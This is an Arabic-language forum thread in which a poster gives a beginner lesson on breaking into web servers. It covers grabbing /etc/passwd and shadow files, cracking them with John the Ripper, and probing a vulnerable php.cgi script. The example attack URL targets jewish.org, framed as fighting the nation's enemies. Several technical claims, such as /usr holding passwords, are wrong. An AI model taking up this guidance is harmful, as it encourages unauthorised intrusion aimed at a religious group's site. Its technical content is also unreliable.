[/COLOR][COLOR='2B45EB']ا[/COLOR][COLOR='2841EC']ل[/COLOR][COLOR='263DEE']ي[/COLOR][COLOR='2339EF'] [/COLOR][COLOR='2135F0']ي[/COLOR][COLOR='1F32F1']ق[/COLOR][COLOR='1C2EF2']و[/COLOR][COLOR='1A2AF3']م[/COLOR][COLOR='1826F4'] [/COLOR][COLOR='1522F5']ب[/COLOR][COLOR='131FF6']ه[/COLOR][COLOR='111BF7'] [/COLOR][COLOR='0E17F8']ا[/COLOR][COLOR='0C13FA']ل[/COLOR][COLOR='090FFB']ف[/COLOR][COLOR='070BFC'] [/COLOR][COLOR='0508FD']ش[/COLOR][COLOR='0204FE']ك[/COLOR][COLOR='0000FF']ر[/COLOR]شكرا اخ super engعلى المداخله
      وأخيرا رجعة الى الساحة بعد غياب طويل |a
    • SuperEng أشكر لك مداخلتك الهـادفه للموضوع ، و أعتقد إني شرحة من قبل أنظمة الشبكـات بس دامك مهتم في الموضوع أعدك إني راح أشرح الشبكـات مره أخرى ......

      بس تـابع الموضوع......

      وشكر خـاص للأخ نساى للدعم الواضح ومتــابعة ساحة الكمبيوتر بمـا تحمله من جديد

      الأمير
    • الاختراق بالثغرات ،، أرجـــــــــو التركيز و المشاركـة....

      الاختراق بالثغرات


      اخواني عالم الاختراق كبير جدا ...وبسيط جدا جدا لانه من صنع البشر ، كوني احد الاعضاء في هذا الســـاحة وجديد في باب الاختراق عن طريق الثغرات ، وحتى تحصل الفائده للجميع ونتعلم من بعض ..فليس عيبا طلب العلم انما العيب الجهل والتعالي بالعلم نحن نتعلم لا لنجابه العلماء بل لننفع امتنا ونرفع رايتها ونقف في وجه من يعاديها .....
      في الحقيقه موضوع الثغرات بسيط جدا مثل ما انا قريت عنه بس يبي متابعه وشوية جهد أنا ساطرح بعض الاسئله لعل الاخوان المشرفين أو الكتاب يساعدونا في الموضوع ....

      من خلال قرائتي للعديد من تكست الثغرات رغم قدامتها تبين لي عدة امور

      * لن تخترق الموقع (host) اللي مستضيفه السيرفر حتى تمتلك اليوزر والباسوور وهذا شيء طبيعي


      * لن تخترق السيرفر حتى تمتلك ملف الصلاحيات (passwd) اللي هو حق الحسابات للمواقع المستأجره

      عند السيرفر بس سؤالي اللي محيرني ان الملف واقع تحت مجلد اسمه اي تي سي etc/passwd/

      احيان يكون اسمه shadow ويعني ان كلمة المرور نجمه او اكس او علامة تعجب اما passwd فتأتي فيه

      الكلمه مشفره وتستخدم لها john the ripper اللي يفك تشفيرها طبعا ملفات الشادو مالك امل للحين

      على حسب علمي مافيه برنامج لها ؟؟؟

      فيه سؤال هنا اللي نعرفه ان كل ملف له امتداد بس ليش الملف ذا ماله امتداد ؟

      واذا حصلت الملف باي طريقه كانت ؟؟ باي صيغه احفظه هل يحفظ كتكست ام (pwd) او (اي صيغه) ؟

      بعدين فيه سؤال ثاني المجلد اللي فيه الملف من مجلدات اليونكس ؟ لانه كما معروف ان اليونكس

      له ست مجلدات

      bin خاص بالملفات الثنائيه يعني اللي تشغل النظام
      etc ملفات ادارة النظام ومن ظمنها الرووت اللي هو حساب مدير النظام او passwd
      dev ملفات الاجهزه
      lib مكتبات الربط الديناميكي اللي تساعد النظام في التشغيل
      tmp الملفات الموقته او غير الثابته
      usr اسماء المستخدمين وكلمات السر اللي لهم حسابت بالنظام

      هل يعني ذلك لو ان السيرفر فيه نظام nt اقدر انزل الملف منه ؟ وان المجلدات نفسها اللي باليونكس

      مثل الي موجوده في nt ام تختلف واسم الملف يختلف admin.pwd مثلا

      * بالنسبه لطريقة الثغرات تعني الطرق للوصول للملفات السابقه او ملفات اخرى

      ومن اشهرها ثغرات السي جي اي نسبة للمجلد cgi-bin او ملفات من امتداد cgi

      ماعلينا ليش سموها ؟؟؟

      طيب وشلون نتعامل مع الثغره والموقع ببساطه شديده لنفترض ان لدينا ثغرهphp.cgi ونريد

      تطبيقها على موقع ذو دومين نيم يعني مو مستضاف مثلا jewish.org نفعل التالي

      jewish.org ثم نكتب cgi-bin/ ثم الثغره php.cgi بحيث تصبح الخطوات بعد تجميعها

      jewish.org/cgi-bin/php.cgi الكلام هذا كله في المستعرض عندك في حقل الادرس العنوان


      انا نسيت اقول حاجه ماني متأكد منها لعل من يعلق على الموضوع ان كانت غير صحيحه يصححها

      ان ممكن تكون الثغره بمجلد ثاني اسمه scripts وتصبح الثغره السابقه

      jewish.org/scripts/php.cgi

      scripts خاص بسيرفرات فيها winnt

      cgi-bin خاص بسيرفرات يونيكس او ايريس او لينكس

      للمعلوميه المجلدات السابقه توضع فيها الملفات التنفيذبه من جهة السيرفر مثل الابلت جافا

      اما ملفات السكربت جافا تنفذ على جهازك مثل اللي تطلع في المستعرض



      أرجــوا أن تسامحوني اذا قصرت أو أخطأت كما آمل منكم مد كفوفكم معي وتصحيحي ، فـمـا من أحد علم إلا فوقه من أعلم منه وصدقوني مـا أنـا بعـالم ولا بمخترق عظيم ولكني أحـاول رفع أمتى ونصرة الحق فلا تتخلوا عني وإنصروني ينصركم الله .
      الأمير
    • شكراً اخي الاميــر على المعلومات المفيده والموضوع الممتاز جداً

      واتمنى ان تكثر بمثل هذي المواضيع

      بس ابي اسالك سؤال خاص بالدرس الاول والثاني
      انت تقدر تستفيد شي من الكلام الي قلته
      لك قدره انك تبحث البروتات لاي سيرفر لك قدره انك تشتغل من جهازك على جهاز اخر خادم مو جهاز عادي
      مثلا تشتغل على الخادم الخاص باحدى مزودي خدمه الانترنت


      ارجوا اني القى الاجابه في اقرب وقت


      بااي
    • mehsal تحياتي لك أخي ......


      أمـا بشأن الرد الذي تنتظر الرد عليه فسمحلي أخي العزيز على أن أقول لك وللأسف الشديد إني مـا فهمتك ، أرجو التوضيح ؟

      ولكن الدرس الأول والثاني مجرد معلومـات وطرق صغيره يعني كل الموضوع معلومـات بسيطه هذا من نـاحية أمـا إن كنت تريد أن تصبح هكر وتكمل مشوارك فلا تعتقد أنك ستنجح إلا إذا صممت وثابرت يعني أنصحك بزيارة المواقع التعليميه ، لهذا سأرفق لك مواقع لربمى تساعدك......
      و لكن يجب عليك تخصيص جهـاز لا يحمل أي معلومه قيمه لكي تكون في مأمن ، وبإمكـانك تنزيل البرامج والمحـاوله ولكن لا تيأس ........

      لك تحياتي
      الأمير



      [WEB]http://amalal3mr.tripod.com/a.htm[/WEB]
    • السلام عليكم ورحمة الله وبركاته

      اخي العزيز الاميـر

      بصراحه انا قريت دروسك
      ولما قلتلك الدرس الاول او الثاني تراني كنت مو متاكد من الدرس بالضبط
      المهم انت ما جاوبت على سؤالي وهو
      لك قدره انك تشتغل من جهازك على جهاز اخر خادم مو جهاز عادي
      مثلا تشتغل على الخادم الخاص باحدى مزودي خدمه الانترنت

      وانا تراني هكرز .. لكن مو مثلك يعني انا متوسط مو متقدم;)
    • أشكرك أخي على إخباري بأنك هكر والظـاهر إنك موب هين ولكن تقلل من قيمتك ......$$t $ :confused:
      لذا أقترح عليك نكون على المـاسنجر إذا كـان مـا عندك مـانع ، أمـا بشأن تشغيل الجهـاز على سيرفر آخر ، طبعـاً كل واحد لازم يشغل جهـازه على سيرفر ولا كيف بتتوفر له الخدمه ، هذا من نـاحيه ومن نـاحيه أخرى إذا كنت تعمل تحت شبكة كمبيوتر أقصد النت ويرك فلازم يكون عندك البروكسي الخـاص بالسيرفر ، أمـا إذا أردت تشغيل الجهـازك على نفس النت ويرك بس عن طريق الدايل أب بعد تقدر ، أخي العزيز مـا أعرف شو تقصد ، طبعـا في سيرفرات ثانيه بس عن طريق الدايل أب مثل هذه السيرفرات بعد بستطـاعتك أن تعمل عليهن بس لاحظ التكلفه إلي بتكون عليك لذا شو تقول أقترح عليك وللمره الثانيه الجلوس والنقاش على المـاسنجر ، لو إني أخـاف شوي من هكر ، بس موب مشكله أعتقد إنك مـاراح تضرني ولا شو تقول

      تحياتي لك وأنـا في إنتظـارك

      الأمير

      a4hot@hotmail.com